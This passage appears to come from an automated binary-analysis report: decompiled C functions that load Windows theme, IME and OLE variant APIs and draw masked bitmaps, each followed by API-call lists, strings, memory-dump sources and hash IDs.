             *0x46640c = GetProcAddress( *0x46646c, "GetThemeMargins");
             *0x466410 = GetProcAddress( *0x46646c, "GetThemeIntList");
             *0x466414 = GetProcAddress( *0x46646c, "GetThemePropertyOrigin");
             *0x466418 = GetProcAddress( *0x46646c, "SetWindowTheme");
             *0x46641c = GetProcAddress( *0x46646c, "GetThemeFilename");
             *0x466420 = GetProcAddress( *0x46646c, "GetThemeSysColor");
             *0x466424 = GetProcAddress( *0x46646c, "GetThemeSysColorBrush");
             *0x466428 = GetProcAddress( *0x46646c, "GetThemeSysBool");
             *0x46642c = GetProcAddress( *0x46646c, "GetThemeSysSize");
             *0x466430 = GetProcAddress( *0x46646c, "GetThemeSysFont");
             *0x466434 = GetProcAddress( *0x46646c, "GetThemeSysString");
             *0x466438 = GetProcAddress( *0x46646c, "GetThemeSysInt");
             *0x46643c = GetProcAddress( *0x46646c, "IsThemeActive");
             *0x466440 = GetProcAddress( *0x46646c, "IsAppThemed");
             *0x466444 = GetProcAddress( *0x46646c, "GetWindowTheme");
             *0x466448 = GetProcAddress( *0x46646c, "EnableThemeDialogTexture");
             *0x46644c = GetProcAddress( *0x46646c, "IsThemeDialogTextureEnabled");
             *0x466450 = GetProcAddress( *0x46646c, "GetThemeAppProperties");
             *0x466454 = GetProcAddress( *0x46646c, "SetThemeAppProperties");
             *0x466458 = GetProcAddress( *0x46646c, "GetCurrentThemeName");
             *0x46645c = GetProcAddress( *0x46646c, "GetThemeDocumentationProperty");
             *0x466460 = GetProcAddress( *0x46646c, "DrawThemeParentBackground");
             *0x466464 = GetProcAddress( *0x46646c, "EnableTheming");
        }
    }
    _v5 =  *0x46646c > 0;
    _pop(_t108);
     *[fs:eax] = _t108;
    _push(0x42b986);
    _t6 =  *0x466474; // 0x27ea870
    return E0042B404(_t6);
}

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0042B97F), ref: 0042B602
                                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0042B61A
                                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0042B62C
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042B63E
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042B650
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042B662
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042B674
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0042B686
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0042B698
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0042B6AA
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0042B6BC
                                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042B6CE
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042B6E0
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042B6F2
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042B704
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042B716
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0042B728
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0042B73A
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0042B74C
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042B75E
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0042B770
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0042B782
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0042B794
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042B7A6
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0042B7B8
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0042B7CA
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0042B7DC
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042B7EE
                                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042B800
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042B812
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042B824
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042B836
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0042B848
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0042B85A
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0042B86C
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0042B87E
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0042B890
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042B8A2
                                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042B8B4
                                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042B8C6
                                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0042B8D8
                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0042B8EA
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0042B8FC
                                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042B90E
                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042B920
                                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042B932
                                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0042B944
                                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0042B956
                                                                            Strings
                                                                            • OpenThemeData , xrefs: 0042B612
                                                                            • EnableThemeDialogTexture , xrefs: 0042B8D0
                                                                            • DrawThemeIcon , xrefs: 0042B6EA
                                                                            • IsAppThemed , xrefs: 0042B8AC
                                                                            • SetThemeAppProperties , xrefs: 0042B906
                                                                            • DrawThemeBackground , xrefs: 0042B636
                                                                            • IsThemeDialogTextureEnabled , xrefs: 0042B8E2
                                                                            • IsThemeActive , xrefs: 0042B89A
                                                                            • DrawThemeText , xrefs: 0042B648
                                                                            • GetCurrentThemeName , xrefs: 0042B918
                                                                            • GetThemeEnumValue , xrefs: 0042B77A
                                                                            • GetThemePropertyOrigin , xrefs: 0042B7E6
                                                                            • GetThemePartSize , xrefs: 0042B67E
                                                                            • GetThemeSysColorBrush , xrefs: 0042B82E
                                                                            • GetThemePosition , xrefs: 0042B78C
                                                                            • IsThemeBackgroundPartiallyTransparent , xrefs: 0042B70E
                                                                            • GetThemeInt , xrefs: 0042B768
                                                                            • CloseThemeData , xrefs: 0042B624
                                                                            • GetThemeBackgroundRegion , xrefs: 0042B6B4
                                                                            • GetThemeTextExtent , xrefs: 0042B690
                                                                            • SetWindowTheme , xrefs: 0042B7F8
                                                                            • GetThemeBackgroundContentRect , xrefs: 0042B65A, 0042B66C
                                                                            • GetWindowTheme , xrefs: 0042B8BE
                                                                            • GetThemeAppProperties , xrefs: 0042B8F4
                                                                            • DrawThemeEdge , xrefs: 0042B6D8
                                                                            • GetThemeSysString , xrefs: 0042B876
                                                                            • GetThemeDocumentationProperty , xrefs: 0042B92A
                                                                            • GetThemeFont , xrefs: 0042B79E
                                                                            • GetThemeSysFont , xrefs: 0042B864
                                                                            • GetThemeSysBool , xrefs: 0042B840
                                                                            • GetThemeMetric , xrefs: 0042B732
                                                                            • GetThemeSysColor , xrefs: 0042B81C
                                                                            • GetThemeColor , xrefs: 0042B720
                                                                            • GetThemeIntList , xrefs: 0042B7D4
                                                                            • DrawThemeParentBackground , xrefs: 0042B93C
                                                                            • GetThemeRect , xrefs: 0042B7B0
                                                                            • GetThemeSysSize , xrefs: 0042B852
                                                                            • GetThemeSysInt , xrefs: 0042B888
                                                                            • IsThemePartDefined , xrefs: 0042B6FC
                                                                            • HitTestThemeBackground , xrefs: 0042B6C6
                                                                            • GetThemeTextMetrics , xrefs: 0042B6A2
                                                                            • GetThemeFilename , xrefs: 0042B80A
                                                                            • GetThemeMargins , xrefs: 0042B7C2
                                                                            • uxtheme.dll , xrefs: 0042B5FD
                                                                            • GetThemeString , xrefs: 0042B744
                                                                            • EnableTheming , xrefs: 0042B94E
                                                                            • GetThemeBool , xrefs: 0042B756
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                            • API String ID: 2238633743-2910565190
                                                                            • Opcode ID: d1f5ae21772bde1dc101fc0c65939c113a2ac02c18929f536ac1eaa0c24a1e19
                                                                            • Instruction ID: 02f122594848a3c283428a16239ca51583220fa1077c2258b21d737a31e4475e
                                                                            • Opcode Fuzzy Hash: d1f5ae21772bde1dc101fc0c65939c113a2ac02c18929f536ac1eaa0c24a1e19
                                                                            • Instruction Fuzzy Hash: 93A12EB0640734AFDB00EB65EC86A253FA8EB45704752067BF401DF295E7B9A850CB5E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
                                                                            E004474DC() {
                                                                                int _v8;
                                                                                intOrPtr _t4;
                                                                                struct HINSTANCE__* _t11;
                                                                                struct HINSTANCE__* _t13;
                                                                                struct HINSTANCE__* _t15;
                                                                                struct HINSTANCE__* _t17;
                                                                                struct HINSTANCE__* _t19;
                                                                                struct HINSTANCE__* _t21;
                                                                                struct HINSTANCE__* _t23;
                                                                                struct HINSTANCE__* _t25;
                                                                                struct HINSTANCE__* _t27;
                                                                                struct HINSTANCE__* _t29;
                                                                                intOrPtr _t40;
                                                                                intOrPtr _t42;
                                                                                intOrPtr _t44;

                                                                                _t42 = _t44;
                                                                                _t4 = *0x462f3c; // 0x4658c8
                                                                                if( *((char*)(_t4 + 0xc)) == 0) {
                                                                                    return _t4;
                                                                                } else {
                                                                                    _v8 = SetErrorMode(0x8000);
                                                                                    _push(_t42);
                                                                                    _push(0x447642);
                                                                                    _push( *[fs:eax]);
                                                                                    *[fs:eax] = _t44;
                                                                                    if( *0x466548 == 0) {
                                                                                        *0x466548 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
                                                                                    }
                                                                                    if( *0x46268c == 0) {
                                                                                        *0x46268c = LoadLibraryA("imm32.dll");
                                                                                        if( *0x46268c != 0) {
                                                                                            _t11 = *0x46268c; // 0x0
                                                                                            *0x46654c = GetProcAddress(_t11, "ImmGetContext");
                                                                                            _t13 = *0x46268c; // 0x0
                                                                                            *0x466550 = GetProcAddress(_t13, "ImmReleaseContext");
                                                                                            _t15 = *0x46268c; // 0x0
                                                                                            *0x466554 = GetProcAddress(_t15, "ImmGetConversionStatus");
                                                                                            _t17 = *0x46268c; // 0x0
                                                                                            *0x466558 = GetProcAddress(_t17, "ImmSetConversionStatus");
                                                                                            _t19 = *0x46268c; // 0x0
                                                                                            *0x46655c = GetProcAddress(_t19, "ImmSetOpenStatus");
                                                                                            _t21 = *0x46268c; // 0x0
                                                                                            *0x466560 = GetProcAddress(_t21, "ImmSetCompositionWindow");
                                                                                            _t23 = *0x46268c; // 0x0
                                                                                            *0x466564 = GetProcAddress(_t23, "ImmSetCompositionFontA");
                                                                                            _t25 = *0x46268c; // 0x0
                                                                                            *0x466568 = GetProcAddress(_t25, "ImmGetCompositionStringA");
                                                                                            _t27 = *0x46268c; // 0x0
                                                                                            *0x46656c = GetProcAddress(_t27, "ImmIsIME");
                                                                                            _t29 = *0x46268c; // 0x0
                                                                                            *0x466570 = GetProcAddress(_t29, "ImmNotifyIME");
                                                                                        }
                                                                                    }
                                                                                    _pop(_t40);
                                                                                    *[fs:eax] = _t40;
                                                                                    _push(0x447649);
                                                                                    return SetErrorMode(_v8);
                                                                                }
                                                                            }

                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00008000), ref: 004474F5
                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00447642,?,00008000), ref: 00447519
                                                                            • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00447526
                                                                            • LoadLibraryA.KERNEL32(imm32.dll,00000000,00447642,?,00008000), ref: 00447542
                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00447564
                                                                            • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00447579
                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044758E
                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004475A3
                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004475B8
                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004475CD
                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004475E2
                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004475F7
                                                                            • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044760C
                                                                            • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00447621
                                                                            • SetErrorMode.KERNEL32(?,00447649,00008000), ref: 0044763C
                                                                            Strings
                                                                            • ImmNotifyIME , xrefs: 00447616
                                                                            • ImmIsIME , xrefs: 00447601
                                                                            • ImmGetContext , xrefs: 00447559
                                                                            • ImmSetOpenStatus , xrefs: 004475AD
                                                                            • USER32 , xrefs: 00447514
                                                                            • ImmSetConversionStatus , xrefs: 00447598
                                                                            • ImmGetCompositionStringA , xrefs: 004475EC
                                                                            • imm32.dll , xrefs: 0044753D
                                                                            • ImmSetCompositionWindow , xrefs: 004475C2
                                                                            • WINNLSEnableIME , xrefs: 00447520
                                                                            • ImmReleaseContext , xrefs: 0044756E
                                                                            • ImmSetCompositionFontA , xrefs: 004475D7
                                                                            • ImmGetConversionStatus , xrefs: 00447583
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                            • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                                                            • API String ID: 3397921170-3950384806
                                                                            • Opcode ID: 85cd7dde39b5c599270180dfbc2611d832bb0dc38289b90c796d1fbcd3152a98
                                                                            • Instruction ID: e70fe7214d08f84b75ceb215c1bd47e4ba2206317c64f215ae3433f6c64e5f95
                                                                            • Opcode Fuzzy Hash: 85cd7dde39b5c599270180dfbc2611d832bb0dc38289b90c796d1fbcd3152a98
                                                                            • Instruction Fuzzy Hash: 16314CF0644B10BFEB04EB69ED06A153BA9A304314713463AF102D72A0E7FD6811CB2E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E0040E778() {
                                                                                struct HINSTANCE__* _v8;
                                                                                intOrPtr _t46;
                                                                                void* _t91;

                                                                                _v8 = GetModuleHandleA("oleaut32.dll");
                                                                                *0x466228 = E0040E74C("VariantChangeTypeEx", E0040E2C4, _t91);
                                                                                *0x46622c = E0040E74C("VarNeg", E0040E2F4, _t91);
                                                                                *0x466230 = E0040E74C("VarNot", E0040E2F4, _t91);
                                                                                *0x466234 = E0040E74C("VarAdd", E0040E300, _t91);
                                                                                *0x466238 = E0040E74C("VarSub", E0040E300, _t91);
                                                                                *0x46623c = E0040E74C("VarMul", E0040E300, _t91);
                                                                                *0x466240 = E0040E74C("VarDiv", E0040E300, _t91);
                                                                                *0x466244 = E0040E74C("VarIdiv", E0040E300, _t91);
                                                                                *0x466248 = E0040E74C("VarMod", E0040E300, _t91);
                                                                                *0x46624c = E0040E74C("VarAnd", E0040E300, _t91);
                                                                                *0x466250 = E0040E74C("VarOr", E0040E300, _t91);
                                                                                *0x466254 = E0040E74C("VarXor", E0040E300, _t91);
                                                                                *0x466258 = E0040E74C("VarCmp", E0040E30C, _t91);
                                                                                *0x46625c = E0040E74C("VarI4FromStr", E0040E318, _t91);
                                                                                *0x466260 = E0040E74C("VarR4FromStr", E0040E384, _t91);
                                                                                *0x466264 = E0040E74C("VarR8FromStr", E0040E3F0, _t91);
                                                                                *0x466268 = E0040E74C("VarDateFromStr", E0040E45C, _t91);
                                                                                *0x46626c = E0040E74C("VarCyFromStr", E0040E4C8, _t91);
                                                                                *0x466270 = E0040E74C("VarBoolFromStr", E0040E534, _t91);
                                                                                *0x466274 = E0040E74C("VarBstrFromCy", E0040E5B4, _t91);
                                                                                *0x466278 = E0040E74C("VarBstrFromDate", E0040E624, _t91);
                                                                                _t46 = E0040E74C("VarBstrFromBool", E0040E698, _t91);
                                                                                *0x46627c = _t46;
                                                                                return _t46;
                                                                            }

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040E781
                                                                              • Part of subcall function 0040E74C: GetProcAddress.KERNEL32(00000000), ref: 0040E765
                                                                            Strings
                                                                            • VarAnd , xrefs: 0040E855
                                                                            • VarMul , xrefs: 0040E7FD
                                                                            • VarBstrFromBool , xrefs: 0040E95D
                                                                            • VarBoolFromStr , xrefs: 0040E91B
                                                                            • VarR8FromStr , xrefs: 0040E8D9
                                                                            • VarOr , xrefs: 0040E86B
                                                                            • VarCmp , xrefs: 0040E897
                                                                            • VarBstrFromDate , xrefs: 0040E947
                                                                            • VarCyFromStr , xrefs: 0040E905
                                                                            • VarI4FromStr , xrefs: 0040E8AD
                                                                            • VarMod , xrefs: 0040E83F
                                                                            • VarNeg , xrefs: 0040E7A5
                                                                            • VarXor , xrefs: 0040E881
                                                                            • VarDateFromStr , xrefs: 0040E8EF
                                                                            • VarSub , xrefs: 0040E7E7
                                                                            • oleaut32.dll , xrefs: 0040E77C
                                                                            • VarIdiv , xrefs: 0040E829
                                                                            • VarNot , xrefs: 0040E7BB
                                                                            • VarBstrFromCy , xrefs: 0040E931
                                                                            • VarR4FromStr , xrefs: 0040E8C3
                                                                            • VarDiv , xrefs: 0040E813
                                                                            • VarAdd , xrefs: 0040E7D1
                                                                            • VariantChangeTypeEx , xrefs: 0040E78F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                            • API String ID: 1646373207-1918263038
                                                                            • Opcode ID: ea9ec8e8f90291ffff50c1c1e118d913d94cc886ee4d1766b9f2028276f0950e
                                                                            • Instruction ID: 8f20ae1609fd2dd0fa028a6c57cffb4e97aaf0264b3ec7f3cdfbc11af4dc0977
                                                                            • Opcode Fuzzy Hash: ea9ec8e8f90291ffff50c1c1e118d913d94cc886ee4d1766b9f2028276f0950e
                                                                            • Instruction Fuzzy Hash: 424124A16052045BE3047B6F785552BBB99D648714360CC7FF804FB6E1EB7CAC618A2F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                            E00426DC4(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                                                                                int _v8;
                                                                                int _v12;
                                                                                char _v13;
                                                                                struct HDC__* _v20;
                                                                                void* _v24;
                                                                                void* _v28;
                                                                                long _v32;
                                                                                long _v36;
                                                                                struct HPALETTE__* _v40;
                                                                                intOrPtr* _t78;
                                                                                struct HPALETTE__* _t89;
                                                                                struct HPALETTE__* _t95;
                                                                                int _t169;
                                                                                intOrPtr _t176;
                                                                                intOrPtr _t177;
                                                                                struct HDC__* _t179;
                                                                                int _t181;
                                                                                void* _t183;
                                                                                void* _t184;
                                                                                intOrPtr _t185;

                                                                                _t183 = _t184;
                                                                                _t185 = _t184 + 0xffffffdc;
                                                                                _v12 = __ecx;
                                                                                _v8 = __edx;
                                                                                _t179 = __eax;
                                                                                _t181 = _a16;
                                                                                _t169 = _a20;
                                                                                _v13 = 1;
                                                                                _t78 = *0x462f2c; // 0x4617c0
                                                                                if( *_t78 != 2 || _t169 != _a40 || _t181 != _a36) {
                                                                                    _v40 = 0;
                                                                                    _v20 = E00426C14(CreateCompatibleDC(0));
                                                                                    _push(_t183);
                                                                                    _push(0x427039);
                                                                                    _push( *[fs:eax]);
                                                                                    *[fs:eax] = _t185;
                                                                                    _v24 = E00426C14(CreateCompatibleBitmap(_a32, _t169, _t181));
                                                                                    _v28 = SelectObject(_v20, _v24);
                                                                                    _t89 = *0x46634c; // 0x7a080b2a
                                                                                    _v40 = SelectPalette(_a32, _t89, 0);
                                                                                    SelectPalette(_a32, _v40, 0);
                                                                                    if(_v40 == 0) {
                                                                                        _t95 = *0x46634c; // 0x7a080b2a
                                                                                        _v40 = SelectPalette(_v20, _t95, 0xffffffff);
                                                                                    } else {
                                                                                        _v40 = SelectPalette(_v20, _v40, 0xffffffff);
                                                                                    }
                                                                                    RealizePalette(_v20);
                                                                                    StretchBlt(_v20, 0, 0, _t169, _t181, _a12, _a8, _a4, _t169, _t181, 0xcc0020);
                                                                                    StretchBlt(_v20, 0, 0, _t169, _t181, _a32, _a28, _a24, _t169, _t181, 0x440328);
                                                                                    _v32 = SetTextColor(_t179, 0);
                                                                                    _v36 = SetBkColor(_t179, 0xffffff);
                                                                                    StretchBlt(_t179, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t169, _t181, 0x8800c6);
                                                                                    StretchBlt(_t179, _v8, _v12, _a40, _a36, _v20, 0, 0, _t169, _t181, 0x660046);
                                                                                    SetTextColor(_t179, _v32);
                                                                                    SetBkColor(_t179, _v36);
                                                                                    if(_v28 != 0) {
                                                                                        SelectObject(_v20, _v28);
                                                                                    }
                                                                                    DeleteObject(_v24);
                                                                                    _pop(_t176);
                                                                                    *[fs:eax] = _t176;
                                                                                    _push(0x427040);
                                                                                    if(_v40 != 0) {
                                                                                        SelectPalette(_v20, _v40, 0);
                                                                                    }
                                                                                    return DeleteDC(_v20);
                                                                                } else {
                                                                                    _v24 = E00426C14(CreateCompatibleBitmap(_a32, 1, 1));
                                                                                    _v24 = SelectObject(_a12, _v24);
                                                                                    _push(_t183);
                                                                                    _push(0x426e8c);
                                                                                    _push( *[fs:eax]);
                                                                                    *[fs:eax] = _t185;
                                                                                    MaskBlt(_t179, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, 0xccaa0029);
                                                                                    _pop(_t177);
                                                                                    *[fs:eax] = _t177;
                                                                                    _push(0x427040);
                                                                                    _v24 = SelectObject(_a12, _v24);
                                                                                    return DeleteObject(_v24);
                                                                                }
                                                                            }

                                                                            APIs
                                                                            • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00426E07
                                                                            • SelectObject.GDI32(?,?), ref: 00426E1C
                                                                            • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,CCAA0029,00000000,00426E8C,?,?), ref: 00426E60
                                                                            • SelectObject.GDI32(?,?), ref: 00426E7A
                                                                            • DeleteObject.GDI32(?), ref: 00426E86
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00426E9A
                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00426EBB
                                                                            • SelectObject.GDI32(?,?), ref: 00426ED0
                                                                            • SelectPalette.GDI32(?,7A080B2A,00000000), ref: 00426EE4
                                                                            • SelectPalette.GDI32(?,?,00000000), ref: 00426EF6
                                                                            • SelectPalette.GDI32(?,00000000,000000FF), ref: 00426F0B
                                                                            • SelectPalette.GDI32(?,7A080B2A,000000FF), ref: 00426F21
                                                                            • RealizePalette.GDI32(?), ref: 00426F2D
                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00426F4F
                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 00426F71
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00426F79
                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 00426F87
                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00426FB3
                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00426FD8
                                                                            • SetTextColor.GDI32(?,?), ref: 00426FE2
                                                                            • SetBkColor.GDI32(?,?), ref: 00426FEC
                                                                            • SelectObject.GDI32(?,00000000), ref: 00426FFF
                                                                            • DeleteObject.GDI32(?), ref: 00427008
                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 0042702A
                                                                            • DeleteDC.GDI32(?), ref: 00427033
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                                                            • String ID:
                                                                            • API String ID: 3976802218-0
                                                                            • Opcode ID: 517ab2346d95a81a61c2b3fce6b0763266c4b79982b9ae684a357dafb73be95f
                                                                            • Instruction ID: 9a8f0c8cc2b2705459631c9561ebf8b7562dc7de34ad384d938fd6bc3ac72156
                                                                            • Opcode Fuzzy Hash: 517ab2346d95a81a61c2b3fce6b0763266c4b79982b9ae684a357dafb73be95f
                                                                            • Instruction Fuzzy Hash: B681A4B1A00219AFDB50EFA9CD81EAF77FCEB0D714F124459F618E7281C239AD108B65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
E00428D58(void* __eax, long __ecx, struct HPALETTE__* __edx) {
    struct HBITMAP__* _v8;
    struct HDC__* _v12;
    struct HDC__* _v16;
    struct HDC__* _v20;
    char _v21;
    void* _v28;
    void* _v32;
    intOrPtr _v92;
    intOrPtr _v96;
    int _v108;
    int _v112;
    void _v116;
    int _t68;
    long _t82;
    void* _t117;
    intOrPtr _t126;
    intOrPtr _t127;
    long _t130;
    struct HPALETTE__* _t133;
    void* _t137;
    void* _t139;
    intOrPtr _t140;

    _t137 = _t139;
    _t140 = _t139 + 0xffffff90;
    _t130 = __ecx;
    _t133 = __edx;
    _t117 = __eax;
    _v8 = 0;
    if(__eax == 0 || GetObjectA(__eax, 0x54, &_v116) == 0) {
        return _v8;
    } else {
